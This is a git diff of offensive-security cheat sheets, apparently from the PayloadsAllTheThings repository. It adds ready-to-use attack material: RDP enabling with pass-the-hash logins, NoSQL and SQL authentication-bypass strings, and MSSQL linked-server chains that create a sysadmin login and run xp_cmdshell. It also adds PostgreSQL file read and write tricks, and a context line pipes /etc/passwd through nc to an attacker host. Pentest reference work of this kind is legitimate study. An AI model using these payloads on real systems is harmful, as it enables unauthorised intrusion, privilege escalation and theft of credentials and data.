Or connect remotely with `rdesktop`
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
rdesktop -d DOMAIN -u username -p password 10.10.10.10 -g 70 -r disk:share=/home/user/myshare
|
root@payload$ rdesktop -d DOMAIN -u username -p password 10.10.10.10 -g 70 -r disk:share=/home/user/myshare
|
||||||
rdesktop -u username -p password -g 70 -r disk:share=/tmp/myshare 10.10.10.10
|
root@payload$ rdesktop -u username -p password -g 70 -r disk:share=/tmp/myshare 10.10.10.10
|
||||||
# -g : the screen will take up 70% of your actual screen size
|
# -g : the screen will take up 70% of your actual screen size
|
||||||
# -r disk:share : sharing a local folder during a remote desktop session
|
# -r disk:share : sharing a local folder during a remote desktop session
|
||||||
```
|
```
|
||||||
|
@ -156,35 +216,35 @@ rdesktop -u username -p password -g 70 -r disk:share=/tmp/myshare 10.10.10.10
|
||||||
Note: you may need to enable it with the following command
|
Note: you may need to enable it with the following command
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x00000000 /f
|
PS C:\> reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x00000000 /f
|
||||||
netsh firewall set service remoteadmin enable
|
PS C:\> netsh firewall set service remoteadmin enable
|
||||||
netsh firewall set service remotedesktop enable
|
PS C:\> netsh firewall set service remotedesktop enable
|
||||||
```
|
```
|
||||||
|
|
||||||
or with psexec(sysinternals)
|
or with psexec(sysinternals)
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
psexec \\machinename reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
|
PS C:\> psexec \\machinename reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
|
||||||
```
|
```
|
||||||
|
|
||||||
or with crackmapexec
|
or with crackmapexec
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
|
root@payload$ crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
|
||||||
```
|
```
|
||||||
|
|
||||||
or with Metasploit
|
or with Metasploit
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
run getgui -u admin -p 1234
|
root@payload$ run getgui -u admin -p 1234
|
||||||
```
|
```
|
||||||
|
|
||||||
or with xfreerdp
|
or with xfreerdp
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:10.0.0.1 # pass the hash works for Server 2012 R2 / Win 8.1+
|
root@payload$ xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:10.0.0.1 # pass the hash works for Server 2012 R2 / Win 8.1+
|
||||||
xfreerdp -u test -p 36374BD2767773A2DD4F6B010EC5EE0D 192.168.226.129 # pass the hash using Restricted Admin, need an admin account not in the "Remote Desktop Users" group.
|
root@payload$ xfreerdp -u test -p 36374BD2767773A2DD4F6B010EC5EE0D 192.168.226.129 # pass the hash using Restricted Admin, need an admin account not in the "Remote Desktop Users" group.
|
||||||
xfreerd /u:runner /v:10.0.0.1 # password will be asked
|
root@payload$ xfreerd /u:runner /v:10.0.0.1 # password will be asked
|
||||||
```
|
```
|
||||||
|
|
||||||
## Netuse
|
## Netuse
|
||||||
|
@ -192,15 +252,14 @@ xfreerd /u:runner /v:10.0.0.1 # password will be asked
|
||||||
Windows only
|
Windows only
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
net use \\ordws01.cscou.lab /user:DOMAIN\username password
|
PS C:\> net use \\ordws01.cscou.lab /user:DOMAIN\username password C$
|
||||||
C$
|
|
||||||
```
|
```
|
||||||
|
|
||||||
## Runas
|
## Runas
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
runas /netonly /user:DOMAIN\username "cmd.exe"
|
PS C:\> runas /netonly /user:DOMAIN\username "cmd.exe"
|
||||||
runas /noprofil /netonly /user:DOMAIN\username cmd.exe
|
PS C:\> runas /noprofil /netonly /user:DOMAIN\username cmd.exe
|
||||||
```
|
```
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
|
@ -27,8 +27,11 @@
|
||||||
Basic authentication bypass using not equal ($ne) or greater ($gt)
|
Basic authentication bypass using not equal ($ne) or greater ($gt)
|
||||||
|
|
||||||
```json
|
```json
|
||||||
in URL
|
in DATA
|
||||||
username[$ne]=toto&password[$ne]=toto
|
username[$ne]=toto&password[$ne]=toto
|
||||||
|
login[$regex]=a.*&pass[$ne]=lol
|
||||||
|
login[$gt]=admin&login[$lt]=test&pass[$ne]=1
|
||||||
|
login[$nin][]=admin&login[$nin][]=test&pass[$ne]=toto
|
||||||
|
|
||||||
in JSON
|
in JSON
|
||||||
{"username": {"$ne": null}, "password": {"$ne": null}}
|
{"username": {"$ne": null}, "password": {"$ne": null}}
|
||||||
|
|
21
README.md
|
@ -17,6 +17,9 @@ You might also like the `Methodology and Resources` folder :
|
||||||
|
|
||||||
- [Methodology and Resources](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/)
|
- [Methodology and Resources](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/)
|
||||||
- [Active Directory Attack.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md)
|
- [Active Directory Attack.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md)
|
||||||
|
- [Cloud - AWS Pentest.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20AWS%20Pentest.md)
|
||||||
|
- [Cloud - Azure Pentest.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest.md)
|
||||||
|
- [Cobalt Strike - Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cobalt%20Strike%20-%20Cheatsheet.md)
|
||||||
- [Linux - Persistence.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Persistence.md)
|
- [Linux - Persistence.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Persistence.md)
|
||||||
- [Linux - Privilege Escalation.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md)
|
- [Linux - Privilege Escalation.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md)
|
||||||
- [Metasploit - Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Metasploit%20-%20Cheatsheet.md)
|
- [Metasploit - Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Metasploit%20-%20Cheatsheet.md)
|
||||||
|
@ -31,23 +34,7 @@ You might also like the `Methodology and Resources` folder :
|
||||||
- [Windows - Post Exploitation Koadic.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Post%20Exploitation%20Koadic.md)
|
- [Windows - Post Exploitation Koadic.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Post%20Exploitation%20Koadic.md)
|
||||||
- [Windows - Privilege Escalation.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md)
|
- [Windows - Privilege Escalation.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md)
|
||||||
- [Windows - Using credentials.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Using%20credentials.md)
|
- [Windows - Using credentials.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Using%20credentials.md)
|
||||||
|
|
||||||
- [CVE Exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits)
|
- [CVE Exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits)
|
||||||
- Apache Struts 2 CVE-2013-2251 CVE-2017-5638 CVE-2018-11776_.py
|
|
||||||
- Apache Struts 2 CVE-2017-9805.py
|
|
||||||
- Apache Struts 2 CVE-2018-11776.py
|
|
||||||
- Docker API RCE.py
|
|
||||||
- Drupalgeddon2 CVE-2018-7600.rb
|
|
||||||
- Heartbleed CVE-2014-0160.py
|
|
||||||
- JBoss CVE-2015-7501.py
|
|
||||||
- Jenkins CVE-2015-8103.py
|
|
||||||
- Jenkins CVE-2016-0792.py
|
|
||||||
- Rails CVE-2019-5420.rb
|
|
||||||
- Shellshock CVE-2014-6271.py
|
|
||||||
- Tomcat CVE-2017-12617.py
|
|
||||||
- WebLogic CVE-2016-3510.py
|
|
||||||
- WebLogic CVE-2017-10271.py
|
|
||||||
- WebLogic CVE-2018-2894.py
|
|
||||||
- WebSphere CVE-2015-7450.py
|
|
||||||
|
|
||||||
You want more ? Check the [Books](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/BOOKS.md) and [Youtube videos](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/YOUTUBE.md) selections.
|
You want more ? Check the [Books](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/BOOKS.md) and [Youtube videos](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/YOUTUBE.md) selections.
|
||||||
|
|
|
@ -70,7 +70,7 @@ XML Signature Wrapping (XSW) attack, some implementations check for a valid sign
|
||||||
- XSW1 – Applies to SAML Response messages. Add a cloned unsigned copy of the Response after the existing signature.
|
- XSW1 – Applies to SAML Response messages. Add a cloned unsigned copy of the Response after the existing signature.
|
||||||
- XSW2 – Applies to SAML Response messages. Add a cloned unsigned copy of the Response before the existing signature.
|
- XSW2 – Applies to SAML Response messages. Add a cloned unsigned copy of the Response before the existing signature.
|
||||||
- XSW3 – Applies to SAML Assertion messages. Add a cloned unsigned copy of the Assertion before the existing Assertion.
|
- XSW3 – Applies to SAML Assertion messages. Add a cloned unsigned copy of the Assertion before the existing Assertion.
|
||||||
- XSW4 – Applies to SAML Assertion messages. Add a cloned unsigned copy of the Assertion after the existing Assertion.
|
- XSW4 – Applies to SAML Assertion messages. Add a cloned unsigned copy of the Assertion within the existing Assertion.
|
||||||
- XSW5 – Applies to SAML Assertion messages. Change a value in the signed copy of the Assertion and adds a copy of the original Assertion with the signature removed at the end of the SAML message.
|
- XSW5 – Applies to SAML Assertion messages. Change a value in the signed copy of the Assertion and adds a copy of the original Assertion with the signature removed at the end of the SAML message.
|
||||||
- XSW6 – Applies to SAML Assertion messages. Change a value in the signed copy of the Assertion and adds a copy of the original Assertion with the signature removed after the original signature.
|
- XSW6 – Applies to SAML Assertion messages. Change a value in the signed copy of the Assertion and adds a copy of the original Assertion with the signature removed after the original signature.
|
||||||
- XSW7 – Applies to SAML Assertion messages. Add an “Extensions” block with a cloned unsigned assertion.
|
- XSW7 – Applies to SAML Assertion messages. Add an “Extensions” block with a cloned unsigned assertion.
|
||||||
|
|
|
@ -0,0 +1,12 @@
|
||||||
|
1
|
||||||
|
1'
|
||||||
|
1"
|
||||||
|
[1]
|
||||||
|
1`
|
||||||
|
1\
|
||||||
|
1/*'*/
|
||||||
|
1/*!1111'*/
|
||||||
|
1'||'asd'||'
|
||||||
|
1' or '1'='1
|
||||||
|
1 or 1=1
|
||||||
|
'or''='
|
|
@ -17,6 +17,7 @@
|
||||||
* [MSSQL Command execution](#mssql-command-execution)
|
* [MSSQL Command execution](#mssql-command-execution)
|
||||||
* [MSSQL UNC path](#mssql-unc-path)
|
* [MSSQL UNC path](#mssql-unc-path)
|
||||||
* [MSSQL Make user DBA](#mssql-make-user-dba-db-admin)
|
* [MSSQL Make user DBA](#mssql-make-user-dba-db-admin)
|
||||||
|
* [MSSQL Trusted Links](#mssql-trusted-links)
|
||||||
|
|
||||||
## MSSQL comments
|
## MSSQL comments
|
||||||
|
|
||||||
|
@ -25,6 +26,12 @@
|
||||||
/* comment goes here */
|
/* comment goes here */
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## MSSQL User
|
||||||
|
|
||||||
|
```sql
|
||||||
|
SELECT CURRENT_USER
|
||||||
|
```
|
||||||
|
|
||||||
## MSSQL version
|
## MSSQL version
|
||||||
|
|
||||||
```sql
|
```sql
|
||||||
|
@ -162,6 +169,25 @@ sqsh -S 192.168.1.X -U sa -P superPassword
|
||||||
python mssqlclient.py WORKGROUP/Administrator:password@192.168.1X -port 46758
|
python mssqlclient.py WORKGROUP/Administrator:password@192.168.1X -port 46758
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Execute Python script
|
||||||
|
|
||||||
|
> Executed by a different user than the one using xp_cmdshell to execute commands
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
#Print the user being used (and execute commands)
|
||||||
|
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("getpass").getuser())'
|
||||||
|
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))'
|
||||||
|
#Open and read a file
|
||||||
|
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())'
|
||||||
|
#Multiline
|
||||||
|
EXECUTE sp_execute_external_script @language = N'Python', @script = N'
|
||||||
|
import sys
|
||||||
|
print(sys.version)
|
||||||
|
'
|
||||||
|
GO
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## MSSQL UNC Path
|
## MSSQL UNC Path
|
||||||
|
|
||||||
MSSQL supports stacked queries so we can create a variable pointing to our IP address then use the `xp_dirtree` function to list the files in our SMB share and grab the NTLMv2 hash.
|
MSSQL supports stacked queries so we can create a variable pointing to our IP address then use the `xp_dirtree` function to list the files in our SMB share and grab the NTLMv2 hash.
|
||||||
|
@ -176,8 +202,42 @@ MSSQL supports stacked queries so we can create a variable pointing to our IP ad
|
||||||
EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;
|
EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## MSSQL Trusted Links
|
||||||
|
|
||||||
|
> The links between databases work even across forest trusts.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
msf> use exploit/windows/mssql/mssql_linkcrawler
|
||||||
|
[msf> set DEPLOY true] #Set DEPLOY to true if you want to abuse the privileges to obtain a meterpreter sessio
|
||||||
|
```
|
||||||
|
|
||||||
|
Manual exploitation
|
||||||
|
|
||||||
|
```sql
|
||||||
|
-- find link
|
||||||
|
select * from master..sysservers
|
||||||
|
|
||||||
|
-- execute query through the link
|
||||||
|
select * from openquery("dcorp-sql1", 'select * from master..sysservers')
|
||||||
|
select version from openquery("linkedserver", 'select @@version as version');
|
||||||
|
|
||||||
|
-- chain multiple openquery
|
||||||
|
select version from openquery("link1",'select version from openquery("link2","select @@version as version")')
|
||||||
|
|
||||||
|
-- execute shell commands
|
||||||
|
EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT LinkedServer
|
||||||
|
select 1 from openquery("linkedserver",'select 1;exec master..xp_cmdshell "dir c:"')
|
||||||
|
|
||||||
|
-- create user and give admin privileges
|
||||||
|
EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
|
||||||
|
EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
|
||||||
|
```
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
* [Pentest Monkey - mssql-sql-injection-cheat-sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
|
* [Pentest Monkey - mssql-sql-injection-cheat-sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
|
||||||
* [Sqlinjectionwiki - MSSQL](http://www.sqlinjectionwiki.com/categories/1/mssql-sql-injection-cheat-sheet/)
|
* [Sqlinjectionwiki - MSSQL](http://www.sqlinjectionwiki.com/categories/1/mssql-sql-injection-cheat-sheet/)
|
||||||
* [Error Based - SQL Injection ](https://github.com/incredibleindishell/exploit-code-by-me/blob/master/MSSQL%20Error-Based%20SQL%20Injection%20Order%20by%20clause/Error%20based%20SQL%20Injection%20in%20“Order%20By”%20clause%20(MSSQL).pdf)
|
* [Error Based - SQL Injection ](https://github.com/incredibleindishell/exploit-code-by-me/blob/master/MSSQL%20Error-Based%20SQL%20Injection%20Order%20by%20clause/Error%20based%20SQL%20Injection%20in%20“Order%20By”%20clause%20(MSSQL).pdf)
|
||||||
|
* [MSSQL Trusted Links - HackTricks.xyz](https://book.hacktricks.xyz/windows/active-directory-methodology/mssql-trusted-links)
|
||||||
|
* [SQL Server – Link… Link… Link… and Shell: How to Hack Database Links in SQL Server! - Antti Rantasaari - June 6th, 2013](https://blog.netspi.com/how-to-hack-database-links-in-sql-server/)
|
||||||
|
* [DAFT: Database Audit Framework & Toolkit - NetSPI](https://github.com/NetSPI/DAFT)
|
|
@ -14,6 +14,7 @@
|
||||||
* [PostgreSQL List tables](#postgresql-list-tables)
|
* [PostgreSQL List tables](#postgresql-list-tables)
|
||||||
* [PostgreSQL List columns](#postgresql-list-columns)
|
* [PostgreSQL List columns](#postgresql-list-columns)
|
||||||
* [PostgreSQL Error Based](#postgresql-error-based)
|
* [PostgreSQL Error Based](#postgresql-error-based)
|
||||||
|
* [PostgreSQL XML Helpers](#postgresql-xml-helpers)
|
||||||
* [PostgreSQL Blind](#postgresql-blind)
|
* [PostgreSQL Blind](#postgresql-blind)
|
||||||
* [PostgreSQL Time Based](#postgresql-time-based)
|
* [PostgreSQL Time Based](#postgresql-time-based)
|
||||||
* [PostgreSQL Stacked query](#postgresql-stacked-query)
|
* [PostgreSQL Stacked query](#postgresql-stacked-query)
|
||||||
|
@ -106,6 +107,21 @@ SELECT column_name FROM information_schema.columns WHERE table_name='data_table'
|
||||||
' and 1=cast((SELECT data_column FROM data_table LIMIT 1 OFFSET data_offset) as int) and '1'='1
|
' and 1=cast((SELECT data_column FROM data_table LIMIT 1 OFFSET data_offset) as int) and '1'='1
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## PostgreSQL XML helpers
|
||||||
|
|
||||||
|
```sql
|
||||||
|
select query_to_xml('select * from pg_user',true,true,''); -- returns all the results as a single xml row
|
||||||
|
```
|
||||||
|
|
||||||
|
The `query_to_xml` above returns all the results of the specified query as a single result. Chain this with the [PostgreSQL Error Based](#postgresql-error-based) technique to exfiltrate data without having to worry about `LIMIT`ing your query to one result.
|
||||||
|
|
||||||
|
```sql
|
||||||
|
select database_to_xml(true,true,''); -- dump the current database to XML
|
||||||
|
select database_to_xmlschema(true,true,''); -- dump the current db to an XML schema
|
||||||
|
```
|
||||||
|
|
||||||
|
Note, with the above queries, the output needs to be assembled in memory. For larger databases, this might cause a slow down or denial of service condition.
|
||||||
|
|
||||||
## PostgreSQL Blind
|
## PostgreSQL Blind
|
||||||
|
|
||||||
```sql
|
```sql
|
||||||
|
@ -135,7 +151,7 @@ select pg_ls_dir('./');
|
||||||
select pg_read_file('PG_VERSION', 0, 200);
|
select pg_read_file('PG_VERSION', 0, 200);
|
||||||
```
|
```
|
||||||
|
|
||||||
NOTE: ``pg_read_file` doesn't accept the `/` character.
|
NOTE: Earlier versions of Postgres did not accept absolute paths in `pg_read_file` or `pg_ls_dir`. Newer versions (as of [this](https://github.com/postgres/postgres/commit/0fdc8495bff02684142a44ab3bc5b18a8ca1863a) commit) will allow reading any file/filepath for super users or users in the `default_role_read_server_files` group.
|
||||||
|
|
||||||
```sql
|
```sql
|
||||||
CREATE TABLE temp(t TEXT);
|
CREATE TABLE temp(t TEXT);
|
||||||
|
@ -143,6 +159,12 @@ COPY temp FROM '/etc/passwd';
|
||||||
SELECT * FROM temp limit 1 offset 0;
|
SELECT * FROM temp limit 1 offset 0;
|
||||||
```
|
```
|
||||||
|
|
||||||
|
```sql
|
||||||
|
SELECT lo_import('/etc/passwd'); -- will create a large object from the file and return the OID
|
||||||
|
SELECT lo_get(16420); -- use the OID returned from the above
|
||||||
|
SELECT * from pg_largeobject; -- or just get all the large objects and their data
|
||||||
|
```
|
||||||
|
|
||||||
## PostgreSQL File Write
|
## PostgreSQL File Write
|
||||||
|
|
||||||
```sql
|
```sql
|
||||||
|
@ -152,6 +174,12 @@ SELECT * FROM pentestlab;
|
||||||
COPY pentestlab(t) TO '/tmp/pentestlab';
|
COPY pentestlab(t) TO '/tmp/pentestlab';
|
||||||
```
|
```
|
||||||
|
|
||||||
|
```sql
|
||||||
|
SELECT lo_from_bytea(43210, 'your file data goes in here'); -- create a large object with OID 43210 and some data
|
||||||
|
SELECT lo_put(43210, 20, 'some other data'); -- append data to a large object at offset 20
|
||||||
|
SELECT lo_export(43210, '/tmp/testexport'); -- export data to /tmp/testexport
|
||||||
|
```
|
||||||
|
|
||||||
## PostgreSQL Command execution
|
## PostgreSQL Command execution
|
||||||
|
|
||||||
### CVE-2019–9193
|
### CVE-2019–9193
|
||||||
|
@ -180,4 +208,5 @@ SELECT system('cat /etc/passwd | nc <attacker IP> <attacker port>');
|
||||||
* [A Penetration Tester’s Guide to PostgreSQL - David Hayter](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9)
|
* [A Penetration Tester’s Guide to PostgreSQL - David Hayter](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9)
|
||||||
* [Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest - Mar 20 2019 - GreenWolf](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5)
|
* [Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest - Mar 20 2019 - GreenWolf](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5)
|
||||||
* [SQL Injection /webApp/oma_conf ctx parameter (viestinta.lahitapiola.fi) - December 8, 2016 - Sergey Bobrov (bobrov)](https://hackerone.com/reports/181803)
|
* [SQL Injection /webApp/oma_conf ctx parameter (viestinta.lahitapiola.fi) - December 8, 2016 - Sergey Bobrov (bobrov)](https://hackerone.com/reports/181803)
|
||||||
* [POSTGRESQL 9.X REMOTE COMMAND EXECUTION - 26 Oct 17 - Daniel](https://www.dionach.com/blog/postgresql-9x-remote-command-execution)
|
* [POSTGRESQL 9.X REMOTE COMMAND EXECUTION - 26 Oct 17 - Daniel](https://www.dionach.com/blog/postgresql-9-x-remote-command-execution/)
|
||||||
|
* [SQL Injection and Postgres - An Adventure to Eventual RCE - May 05, 2020 - Denis Andzakovic](https://pulsesecurity.co.nz/articles/postgres-sqli)
|
||||||
|
|
|
@ -31,6 +31,7 @@ Attempting to manipulate SQL queries may have goals including:
|
||||||
* [Using suffix to tamper the injection](#using-suffix-to-tamper-the-injection)
|
* [Using suffix to tamper the injection](#using-suffix-to-tamper-the-injection)
|
||||||
* [General tamper option and tamper's list](#general-tamper-option-and-tampers-list)
|
* [General tamper option and tamper's list](#general-tamper-option-and-tampers-list)
|
||||||
* [Authentication bypass](#authentication-bypass)
|
* [Authentication bypass](#authentication-bypass)
|
||||||
|
* [Authentication Bypass (Raw MD5 SHA1)](#authentication-bypass-raw-md5-sha1)
|
||||||
* [Polyglot injection](#polyglot-injection-multicontext)
|
* [Polyglot injection](#polyglot-injection-multicontext)
|
||||||
* [Routed injection](#routed-injection)
|
* [Routed injection](#routed-injection)
|
||||||
* [Insert Statement - ON DUPLICATE KEY UPDATE](#insert-statement---on-duplicate-key-update)
|
* [Insert Statement - ON DUPLICATE KEY UPDATE](#insert-statement---on-duplicate-key-update)
|
||||||
|
@ -288,6 +289,9 @@ tamper=name_of_the_tamper
|
||||||
"&"
|
"&"
|
||||||
"^"
|
"^"
|
||||||
"*"
|
"*"
|
||||||
|
'--'
|
||||||
|
"--"
|
||||||
|
'--' / "--"
|
||||||
" or ""-"
|
" or ""-"
|
||||||
" or "" "
|
" or "" "
|
||||||
" or ""&"
|
" or ""&"
|
||||||
|
@ -340,6 +344,7 @@ admin') or '1'='1'#
|
||||||
admin') or '1'='1'/*
|
admin') or '1'='1'/*
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
||||||
admin" --
|
admin" --
|
||||||
|
admin';-- azer
|
||||||
admin" #
|
admin" #
|
||||||
admin"/*
|
admin"/*
|
||||||
admin" or "1"="1
|
admin" or "1"="1
|
||||||
|
@ -362,7 +367,7 @@ admin") or "1"="1"/*
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
||||||
```
|
```
|
||||||
|
|
||||||
## Authentication Bypass (Raw MD5)
|
## Authentication Bypass (Raw MD5 SHA1)
|
||||||
|
|
||||||
When a raw md5 is used, the pass will be queried as a simple string, not a hexstring.
|
When a raw md5 is used, the pass will be queried as a simple string, not a hexstring.
|
||||||
|
|
||||||
|
@ -374,6 +379,7 @@ Allowing an attacker to craft a string with a `true` statement such as `' or 'SO
|
||||||
|
|
||||||
```php
|
```php
|
||||||
md5("ffifdyop", true) = 'or'6<>]<5D><>!r,<2C><>b
|
md5("ffifdyop", true) = 'or'6<>]<5D><>!r,<2C><>b
|
||||||
|
sha1("3fDf ", true) = Q<>u'='<27>@<40>[<5B>t<EFBFBD>- o<><6F>_-!
|
||||||
```
|
```
|
||||||
|
|
||||||
Challenge demo available at [http://web.jarvisoj.com:32772](http://web.jarvisoj.com:32772)
|
Challenge demo available at [http://web.jarvisoj.com:32772](http://web.jarvisoj.com:32772)
|
||||||
|
@ -382,6 +388,9 @@ Challenge demo available at [http://web.jarvisoj.com:32772](http://web.jarvisoj.
|
||||||
|
|
||||||
```sql
|
```sql
|
||||||
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
|
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
|
||||||
|
|
||||||
|
/* MySQL only */
|
||||||
|
IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/
|
||||||
```
|
```
|
||||||
|
|
||||||
## Routed injection
|
## Routed injection
|
||||||
|
|
|
@ -88,4 +88,4 @@ Note: By default this component is disabled
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
[Injecting SQLite database based application - Manish Kishan Tanwar](https://www.exploit-db.com/docs/41397.pdf)
|
[Injecting SQLite database based application - Manish Kishan Tanwar](https://www.exploit-db.com/docs/english/41397-injecting-sqlite-database-based-applications.pdf)
|
||||||
|
|
Before Width: | Height: | Size: 176 B After Width: | Height: | Size: 176 B |
Before Width: | Height: | Size: 181 B After Width: | Height: | Size: 181 B |
|
@ -15,6 +15,7 @@
|
||||||
* [Bypass using IPv6/IPv4 Address Embedding](#bypass-using-ipv6ipv4-address-embedding)
|
* [Bypass using IPv6/IPv4 Address Embedding](#bypass-using-ipv6ipv4-address-embedding)
|
||||||
* [Bypass using malformed urls](#bypass-using-malformed-urls)
|
* [Bypass using malformed urls](#bypass-using-malformed-urls)
|
||||||
* [Bypass using rare address](#bypass-using-rare-address)
|
* [Bypass using rare address](#bypass-using-rare-address)
|
||||||
|
* [Bypass using URL encoding](#bypass-using-url-encoding)
|
||||||
* [Bypass using bash variables](#bypass-using-bash-variables)
|
* [Bypass using bash variables](#bypass-using-bash-variables)
|
||||||
* [Bypass using tricks combination](#bypass-using-tricks-combination)
|
* [Bypass using tricks combination](#bypass-using-tricks-combination)
|
||||||
* [Bypass using enclosed alphanumerics](#bypass-using-enclosed-alphanumerics)
|
* [Bypass using enclosed alphanumerics](#bypass-using-enclosed-alphanumerics)
|
||||||
|
@ -30,7 +31,9 @@
|
||||||
* [gopher://](#gopher)
|
* [gopher://](#gopher)
|
||||||
* [netdoc://](#netdoc)
|
* [netdoc://](#netdoc)
|
||||||
* [SSRF exploiting WSGI](#ssrf-exploiting-wsgi)
|
* [SSRF exploiting WSGI](#ssrf-exploiting-wsgi)
|
||||||
|
* [SSRF exploiting Redis](#ssrf-exploiting-redis)
|
||||||
* [SSRF to XSS](#ssrf-to-xss)
|
* [SSRF to XSS](#ssrf-to-xss)
|
||||||
|
* [SSRF from XSS](#ssrf-from-xss)
|
||||||
* [SSRF URL for Cloud Instances](#ssrf-url-for-cloud-instances)
|
